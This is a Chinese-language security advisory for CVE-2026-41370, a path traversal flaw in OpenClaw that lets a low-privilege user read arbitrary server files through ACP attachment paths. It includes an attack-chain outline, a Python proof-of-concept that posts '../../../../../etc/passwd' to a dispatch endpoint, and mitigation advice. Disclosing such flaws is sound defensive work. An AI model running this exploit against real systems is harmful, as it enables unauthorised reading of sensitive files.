IPBUF安全漏洞报告
English
CVE-2026-41370 CVSS 6.5 中危

CVE-2026-41370 OpenClaw路径遍历漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41370
漏洞类型
路径遍历
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

路径遍历OpenClaw文件读取CWE-22

漏洞概述

OpenClaw 2026.3.31之前的版本存在路径遍历漏洞。攻击者可通过操纵ACP调度中的入站通道附件路径,绕过附件缓存和根目录检查,远程读取服务器上的任意文件。该漏洞源于对用户输入的验证不足,导致低权限攻击者无需用户交互即可获取敏感信息。

技术细节

该漏洞源于OpenClaw在处理ACP(Admin Control Panel)调度模块的入站通道附件路径时,缺乏足够的路径净化机制。应用程序未对用户输入的路径参数进行严格的边界检查和标准化,导致攻击者能够利用路径遍历序列(如“../”或绝对路径)突破预设的附件缓存目录限制。虽然系统设计了根目录检查逻辑,但存在逻辑绕过缺陷,允许攻击者访问预期目录之外的文件。攻击者只需拥有低权限账户即可远程发起攻击,无需目标用户交互。利用该漏洞可导致服务器敏感信息泄露,如源代码、配置文件等,对系统机密性构成严重威胁。

攻击链分析

STEP 1
侦察
识别目标OpenClaw版本,确认其低于2026.3.31。
STEP 2
获取权限
攻击者使用低权限账户登录系统,获取会话凭证。
STEP 3
构造载荷
针对ACP调度模块,构造包含路径遍历字符(如../)的恶意附件路径请求。
STEP 4
发送请求
将恶意请求发送至服务器,绕过缓存和根目录检查。
STEP 5
数据窃取
服务器响应并返回目标路径下的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-ip:port" login_endpoint = "/api/login" vulnerable_endpoint = "/acp/dispatch/attachment" # Attacker credentials (low privilege) username = "attacker" password = "password" # Malicious payload using path traversal # Attempting to read /etc/passwd payload_path = "../../../../../etc/passwd" session = requests.Session() # 1. Authenticate to get a valid session login_data = {"username": username, "password": password} response = session.post(target_url + login_endpoint, data=login_data) if response.status_code == 200: # 2. Send payload to vulnerable ACP dispatch endpoint exploit_data = { "channel_id": "1", "attachment_path": payload_path } exploit_response = session.post(target_url + vulnerable_endpoint, data=exploit_data) # 3. Check if file content is returned if "root:" in exploit_response.text: print("[+] Exploit successful! File content retrieved:") print(exploit_response.text) else: print("[-] Exploit failed or target not vulnerable.") else: print("[-] Login failed.")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施
在升级修复前,建议暂时关闭非必要的ACP入站通道功能,或在网络边界(如WAF/防火墙)上部署规则,拦截包含“../”或绝对路径特征的异常请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表